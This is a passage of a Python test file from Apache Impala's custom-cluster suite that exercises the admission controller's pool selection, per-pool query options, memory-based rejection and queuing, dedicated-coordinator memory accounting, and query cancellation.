from copy import copy
from time import sleep, time
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.resource_pool_config import ResourcePoolConfig
from tests.common.skip import (
SkipIfS3,
SkipIfGCS,
SkipIfCOS,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfNotHdfsMinicluster,
SkipIfOS)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_vector import ImpalaTestDimension
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
from tests.util.web_pages_util import (
get_num_completed_backends,
get_mem_admitted_backends_debug_page)
from tests.verifiers.mem_usage_verifier import MemUsageVerifier
from tests.verifiers.metric_verifier import MetricVerifier
from ImpalaService import ImpalaHiveServer2Service
from TCLIService import TCLIService
LOG = logging.getLogger('admission_test')
# The query used for testing. It is important that this query returns many rows
# while keeping fragments active on all backends. This allows a thread to keep
# the query active and consuming resources by fetching one row at a time. The
# where clause is for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30)
# Same query but with additional unpartitioned non-coordinator fragments.
# The unpartitioned fragments are both interior fragments that consume input
# from a scan fragment and non-interior fragments with a constant UNION.
QUERY_WITH_UNPARTITIONED_FRAGMENTS = """
select *, (select count(distinct int_col) from alltypestiny) subquery1,
(select count(distinct int_col) from alltypes) subquery2,
(select 1234) subquery3
from (""" + QUERY + """) v"""
# The statestore heartbeat and topic update frequency (ms). Set low for testing.
STATESTORE_RPC_FREQUENCY_MS = 100
# Time to sleep (in milliseconds) between issuing queries. When the delay is at least
# the statestore heartbeat frequency, all state should be visible by every impalad by
# the time the next query is submitted. Otherwise the different impalads will see stale
# state for some admission decisions.
SUBMISSION_DELAY_MS = \
[0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2]
# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]
# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"
# Stress test timeout (seconds). The timeout needs to be significantly higher for
# slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241).
STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600)
# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5
# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10
# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024
_STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} "
"-statestore_priority_update_frequency_ms={freq_ms}").format(
freq_ms=STATESTORE_RPC_FREQUENCY_MS)
# Name of the subscriber metric tracking the admission control update interval.
REQUEST_QUEUE_UPDATE_INTERVAL =\
'statestore-subscriber.topic-impala-request-queue.update-interval'
# Key in the query profile for the query options.
PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): "
# The different ways that a query thread can end its query.
QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE']
# The timeout used for the QUERY_TIMEOUT end behaviour
QUERY_END_TIMEOUT_S = 3
# Value used for --admission_control_stale_topic_threshold_ms in tests.
STALE_TOPIC_THRESHOLD_MS = 500
# Regex that matches the first part of the profile info string added when a query is
# queued.
INITIAL_QUEUE_REASON_REGEX = \
"Initial admission queue reason: waited [0-9]* ms, reason: .*"
# The path to resources directory which contains the admission control config files.
RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources")
def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem,
proc_mem_limit=None, queue_wait_timeout_ms=None,
admission_control_slots=None, executor_groups=None):
extra_flags = ""
if proc_mem_limit is not None:
extra_flags += " -mem_limit={0}".format(proc_mem_limit)
if queue_wait_timeout_ms is not None:
extra_flags += " -queue_wait_timeout_ms={0}".format(queue_wait_timeout_ms)
if admission_control_slots is not None:
extra_flags += " -admission_control_slots={0}".format(admission_control_slots)
if executor_groups is not None:
extra_flags += " -executor_groups={0}".format(executor_groups)
return ("-vmodule admission-controller=3 -default_pool_max_requests {0} "
"-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format(
max_requests, max_queued, pool_max_mem, extra_flags))
def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file,
additional_args="", make_copy=False):
fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file)
llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file)
if make_copy:
copy_fs_allocation_path = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file)
copy_llama_site_path = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file)
shutil.copy2(fs_allocation_path, copy_fs_allocation_path)
shutil.copy2(llama_site_path, copy_llama_site_path)
fs_allocation_path = copy_fs_allocation_path
llama_site_path = copy_llama_site_path
return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
"-llama_site_path %s %s" % (fs_allocation_path, llama_site_path,
additional_args))
def log_metrics(log_prefix, metrics):
LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "
"released=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'],
metrics['dequeued'], metrics['rejected'], metrics['released'],
metrics['timed-out'])
def compute_metric_deltas(m2, m1):
"""Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)"""
return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in m2.keys())
def metric_key(pool_name, metric_name):
"""Helper method to construct the admission controller metric keys"""
return "admission-controller.%s.%s" % (metric_name, pool_name)
class TestAdmissionControllerBase(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerBase, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# There's no reason to test this on other file formats/compression codecs right now
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite):
def __check_pool_rejected(self, client, pool, expected_error_re):
try:
client.set_configuration({'request_pool': pool})
client.execute("select 1")
assert False, "Query should return error"
except ImpalaBeeswaxException as e:
assert re.search(expected_error_re, str(e))
def __check_query_options(self, profile, expected_query_options):
"""Validate that the expected per-pool query options were set on the specified
profile. expected_query_options is a list of "KEY=VALUE" strings, e.g.
["MEM_LIMIT=1", ...]"""
confs = []
for line in profile.split("\n"):
if PROFILE_QUERY_OPTIONS_KEY in line:
rhs = re.split(": ", line)[1]
confs = re.split(",", rhs)
break
expected_set = set([x.lower() for x in expected_query_options])
confs_set = set([x.lower() for x in confs])
assert expected_set.issubset(confs_set)
def __check_hs2_query_opts(self, pool_name, mem_limit=None, spool_query_results=None,
expected_options=None):
""" Submits a query via HS2 (optionally with a mem_limit in the confOverlay)
into pool_name and checks that the expected_query_options are set in the
profile."""
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = self.session_handle
execute_statement_req.confOverlay = {'request_pool': pool_name}
if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit
if spool_query_results is not None:
execute_statement_req.confOverlay['spool_query_results'] = spool_query_results
execute_statement_req.statement = "select 1"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
HS2TestSuite.check_response(execute_statement_resp)
fetch_results_req = TCLIService.TFetchResultsReq()
fetch_results_req.operationHandle = execute_statement_resp.operationHandle
fetch_results_req.maxRows = 1
fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req)
HS2TestSuite.check_response(fetch_results_resp)
close_operation_req = TCLIService.TCloseOperationReq()
close_operation_req.operationHandle = execute_statement_resp.operationHandle
HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req))
get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq()
get_profile_req.operationHandle = execute_statement_resp.operationHandle
get_profile_req.sessionHandle = self.session_handle
get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req)
HS2TestSuite.check_response(get_profile_resp)
self.__check_query_options(get_profile_resp.profile, expected_options)
def _execute_and_collect_profiles(self, queries, timeout_s, config_options={},
allow_query_failure=False):
"""Submit the query statements in 'queries' in parallel to the first impalad in
the cluster. After submission, the results are fetched from the queries in
sequence and their profiles are collected. Wait for up to timeout_s for
each query to finish. If 'allow_query_failure' is True, succeeds if the query
completes successfully or ends up in the EXCEPTION state. Otherwise expects the
queries to complete successfully.
Returns the profile strings."""
client = self.cluster.impalads[0].service.create_beeswax_client()
expected_states = [client.QUERY_STATES['FINISHED']]
if allow_query_failure:
expected_states.append(client.QUERY_STATES['EXCEPTION'])
try:
handles = []
profiles = []
client.set_configuration(config_options)
for query in queries:
handles.append(client.execute_async(query))
for query, handle in zip(queries, handles):
state = self.wait_for_any_state(handle, expected_states, timeout_s)
if state == client.QUERY_STATES['FINISHED']:
self.client.fetch(query, handle)
profiles.append(self.client.get_runtime_profile(handle))
return profiles
finally:
client.close()
def get_ac_process(self):
"""Returns the Process that is running the admission control service."""
return self.cluster.impalads[0]
def get_ac_log_name(self):
"""Returns the prefix of the log files for the admission control process."""
return "impalad"
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
default_query_options=[('mem_limit', 200000000)],
statestored_args=_STATESTORED_ARGS)
@needs_session(conf_overlay={'batch_size': '100'})
def test_set_request_pool(self):
"""Tests setting the REQUEST_POOL with the pool placement policy configured
to require a specific pool, and validate that the per-pool configurations were
applied."""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
# Expected default mem limit for queueA, used in several tests below
queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024)
try:
for pool in ['', 'not_a_pool_name']:
expected_error =\
"No mapping found for request from user '\S+' with requested pool '%s'"\
% (pool)
self.__check_pool_rejected(client, pool, expected_error)
# Check rejected if user does not have access.
expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\
"denied access to assigned pool 'root.queueC'"
self.__check_pool_rejected(client, 'root.queueC', expected_error)
# Also try setting a valid pool
client.set_configuration({'request_pool': 'root.queueB'})
result = client.execute("select 1")
# Query should execute in queueB which doesn't have a default mem limit set in the
# llama-site.xml, so it should inherit the value from the default process query
# options.
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB'])
# Try setting the pool for a queue with a very low queue timeout.
# queueA allows only 1 running query and has a queue timeout of 50ms, so the
# second concurrent query should time out quickly.
client.set_configuration({'request_pool': 'root.queueA'})
handle = client.execute_async("select sleep(1000)")
# Wait for query to clear admission control and get accounted for
client.wait_for_admission_control(handle)
self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout")
assert client.get_state(handle) == client.QUERY_STATES['FINISHED']
# queueA has default query options mem_limit=128m,query_timeout_s=5
self.__check_query_options(client.get_runtime_profile(handle),
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA'])
client.close_query(handle)
# IMPALA-9856: We disable query result spooling so that this test can run queries
# with low mem_limit.
client.execute("set spool_query_results=0")
# Should be able to set query options via the set command (overriding defaults if
# applicable). mem_limit overrides the pool default. abort_on_error has no
# proc/pool default.
client.execute("set mem_limit=31337")
client.execute("set abort_on_error=1")
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5',
'REQUEST_POOL=root.queueA'])
# Should be able to set query options (overriding defaults if applicable) with the
# config overlay sent with the query RPC. mem_limit is a pool-level override and
# max_io_buffers has no proc/pool default.
client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA',
'ABORT_ON_ERROR=1'])
# Once options are reset to their defaults, the queue
# configuration should kick back in. We'll see the
# queue-configured mem_limit, and we won't see
# abort on error, because it's back to being the default.
client.execute('set mem_limit=""')
client.execute('set abort_on_error=""')
client.set_configuration({'request_pool': 'root.queueA'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
[queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5'])
finally:
client.close()
# HS2 tests:
# batch_size is set in the HS2 OpenSession() call via the requires_session() test
# decorator, so that is included in all test cases below.
batch_size = "BATCH_SIZE=100"
# Check HS2 query in queueA gets the correct query options for the pool.
self.__check_hs2_query_opts("root.queueA", None, 'false',
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check overriding the mem limit sent in the confOverlay with the query.
self.__check_hs2_query_opts("root.queueA", '12345', 'false',
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check HS2 query in queueB gets the process-wide default query options
self.__check_hs2_query_opts("root.queueB", None, 'false',
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size])
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml",
additional_args="-require_username -anonymous_user_name="),
statestored_args=_STATESTORED_ARGS)
def test_require_user(self):
open_session_req = TCLIService.TOpenSessionReq()
open_session_req.username = ""
open_session_resp = self.hs2_client.OpenSession(open_session_req)
TestAdmissionController.check_response(open_session_resp)
try:
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = open_session_resp.sessionHandle
execute_statement_req.statement = "select count(1) from functional.alltypes"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
self.wait_for_operation_state(execute_statement_resp.operationHandle,
TCLIService.TOperationState.ERROR_STATE)
get_operation_status_resp = self.get_operation_status(
execute_statement_resp.operationHandle)
assert "User must be specified" in get_operation_status_resp.errorMessage
finally:
close_req = TCLIService.TCloseSessionReq()
close_req.sessionHandle = open_session_resp.sessionHandle
TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_trivial_coord_query_limits(self):
"""Tests that trivial coordinator only queries have negligible resource requirements.
"""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Queries with only constant exprs or limit 0 should be admitted.
self.execute_query_expect_success(self.client, "select 1")
self.execute_query_expect_success(self.client,
"select * from functional.alltypes limit 0")
non_trivial_queries = [
"select * from functional.alltypesagg limit 1",
"select * from functional.alltypestiny"]
for query in non_trivial_queries:
ex = self.execute_query_expect_failure(self.client, query)
assert re.search("Rejected query from pool default-pool: request memory needed "
".* is greater than pool max mem resources 10.00 MB", str(ex))
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfCOS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_memory_rejection(self, vector):
"""Test that rejection of queries based on reservation and estimates works as
expected. The test depends on scanner memory estimates, which different on remote
filesystems with different (synthetic) block sizes."""
# Test that the query will be rejected by admission control if:
# a) the largest per-backend min buffer reservation is larger than the query mem limit
# b) the largest per-backend min buffer reservation is larger than the
# buffer_pool_limit query option
# c) the cluster-wide min-buffer reservation size is larger than the pool memory
# resources.
self.run_test_case('QueryTest/admission-reject-min-reservation', vector)
# Test that queries are rejected based on memory estimates. Set num_nodes=1 to
# avoid unpredictability from scheduling on different backends.
exec_options = vector.get_value('exec_option')
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-reject-mem-estimate', vector)
# Process mem_limit used in test_mem_limit_upper_bound
PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT))
def test_mem_limit_upper_bound(self, vector):
""" Test to ensure that a query is admitted if the requested memory is equal to the
process mem limit"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Setting requested memory equal to process memory limit
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
self.execute_query_expect_success(self.client, query, exec_options)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT),
num_exclusive_coordinators=1)
def test_mem_limit_dedicated_coordinator(self, vector):
"""Regression test for IMPALA-8469: coordinator fragment should be admitted on
dedicated coordinator"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Test both single-node and distributed plans
for num_nodes in [0, 1]:
# Memory just fits in memory limits
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
exec_options['num_nodes'] = num_nodes
self.execute_query_expect_success(self.client, query, exec_options)
# A bit too much memory to run on coordinator.
exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1)
ex = self.execute_query_expect_failure(self.client, query, exec_options)
assert ("Rejected query from pool default-pool: request memory needed "
"1.10 GB is greater than memory available for admission 1.00 GB" in
str(ex)), str(ex)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is different than
the ones on executors."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml")
+ " -use_dedicated_coordinator_estimates false",
num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_legacy_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators with specialized dedicated coord
estimates turned off using a hidden startup param, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is the same
(as expected from legacy behavior)."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_sanity_checks_dedicated_coordinator(self, vector, unique_database):
"""Sanity tests for verifying targeted dedicated coordinator memory estimations and
behavior."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
exec_options = vector.get_value('exec_option')
# Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated
# coord estimates. Without this query option the estimate would be > 100MB.
expected_mem = 60 * (1 << 20) # 60MB
exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# If the query is only scheduled on the coordinator then the mem to admit on executor
# should be zero.
exec_options['NUM_NODES'] = 1
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - 0) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# Make sure query execution works perfectly for a query that does not have any
# fragments schdeuled on the coordinator, but has runtime-filters that need to be
# aggregated at the coordinator.
exec_options = vector.get_value('exec_option')
exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000
query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey
FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders
ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database)
result = self.execute_query_expect_success(self.client, query, exec_options)
assert "Runtime filters: All filters arrived" in result.runtime_profile
def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates):
"""Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies
the actual vs expected values for mem admitted and mem limit for both coord and
executor. Also verifies that those memory values are different if
'using_dedicated_coord_estimates' is true."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
# Use a test query that has unpartitioned non-coordinator fragments to make
# sure those are handled correctly (IMPALA-10036).
for query in [QUERY, QUERY_WITH_UNPARTITIONED_FRAGMENTS]:
handle = self.client.execute_async(query.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id)
mem_admitted =\
get_mem_admitted_backends_debug_page(self.cluster, self.get_ac_process())
debug_string = " expected_mem_limits:" + str(
expected_mem_limits) + " actual_mem_limits:" + str(
actual_mem_limits) + " mem_admitted:" + str(mem_admitted)
MB = 1 << 20
# Easiest way to check float in-equality.
assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[
'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string
# There may be some rounding errors so keep a margin of 5MB when verifying
assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(actual_mem_limits['executor'] - expected_mem_limits[
'executor']) < 5 * MB, debug_string
assert abs(mem_admitted['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(
mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \
debug_string
# Ensure all fragments finish executing before running next query.
self.client.fetch(query, handle)
self.client.close_query(handle)
def __get_mem_limits_admission_debug_page(self):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem_limit calculated by the admission controller from the impala admission debug page
of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator'
and 'executor' and their respective mem values in bytes."""
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
response_json = self.get_ac_process().service.get_debug_webpage_json("admission")
assert 'resource_pools' in response_json
assert len(response_json['resource_pools']) == 1
assert response_json['resource_pools'][0]['running_queries']
assert len(response_json['resource_pools'][0]['running_queries']) == 1
query_info = response_json['resource_pools'][0]['running_queries'][0]
return {'coordinator': float(query_info["coord_mem_to_admit"]),
'executor': float(query_info["mem_limit"])}
def __get_mem_limits_memz_debug_page(self, query_id):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem limits enforced on the query (identified by the 'query_id') extracted from
mem-tracker's output on the memz debug page of the dedicated coordinator and the
executor impala daemons. Returns a dictionary with the keys 'coordinator' and
'executor' and their respective mem values in bytes."""
metric_name = "Query({0})".format(query_id)
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in
self.cluster.impalads]
return {'coordinator': float(mem_trackers[0]['limit']),
'executor': float(mem_trackers[1]['limit'])}
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_dedicated_coordinator_planner_estimates(self, vector, unique_database):
"""Planner tests to add coverage for coordinator estimates when using dedicated
coordinators. Also includes coverage for verifying cluster memory admitted."""
vector_copy = copy(vector)
exec_options = vector_copy.get_value('exec_option')
# Remove num_nodes from the options to allow test case runner to set it in one of
# the test cases.
del exec_options['num_nodes']
# Do not turn the default cluster into 2-group one
exec_options['test_replan'] = 0
exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible
self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy,
unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1, cluster_size=2)
def test_mem_limit_executors(self, vector, unique_database):
"""Verify that the query option mem_limit_executors is only enforced on the
executors."""
expected_exec_mem_limit = "999999999"
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
self.client.set_configuration({"MEM_LIMIT_EXECUTORS": expected_exec_mem_limit})
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
assert expected_mem_limits['executor'] > expected_mem_limits[
'coordinator'], expected_mem_limits
assert expected_mem_limits['executor'] == float(
expected_exec_mem_limit), expected_mem_limits
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT,
queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS),
start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G",
statestored_args=_STATESTORED_ARGS)
def test_heterogeneous_proc_mem_limit(self, vector):
""" Test to ensure that the admission controller takes into account the actual proc
mem limits of each impalad. Starts a cluster where the last impalad has a smaller
proc mem limit than other impalads and runs queries where admission/rejection decision
depends on the coordinator knowing the other impalad's mem limits.
The queue_wait_timeout_ms has been set to be more than the prioritized statestore
update time, so that the queries don't time out before receiving updates to pool
stats"""
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg, (select 1) B limit 1"
# Successfully run a query with mem limit equal to the lowest process memory among
# impalads
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
self.execute_query_expect_success(self.client, query, exec_options)
# Test that a query scheduled to run on a single node and submitted to the impalad
# with higher proc mem limit succeeds.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
exec_options['num_nodes'] = "1"
self.execute_query_expect_success(self.client, query, exec_options)
# Exercise rejection checks in admission controller.
try:
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
" is greater than memory available for admission 2.00 GB of \S+", str(e)), \
str(e)
# Exercise queuing checks in admission controller.
try:
# Wait for previous queries to finish to avoid flakiness.
for impalad in self.cluster.impalads:
impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
impalad_with_2g_mem.execute_async("select sleep(1000)")
# Wait for statestore update to update the mem admitted in each node.
sleep(STATESTORE_RPC_FREQUENCY_MS / 1000)
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
# Since Queuing is synchronous and we can't close the previous query till this
# returns, we wait for this to timeout instead.
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
"2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
finally:
if impalad_with_2g_mem is not None:
impalad_with_2g_mem.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
statestored_args=_STATESTORED_ARGS)
def test_cancellation(self):
""" Test to confirm that all Async cancellation windows are hit and are able to
succesfully cancel the query"""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
handle = client.execute_async("select 1")
sleep(1)
client.close_query(handle)
self.assert_log_contains(self.get_ac_log_name(), 'INFO',
"Ready to be Rejected but already cancelled, query id=")
client.clear_configuration()
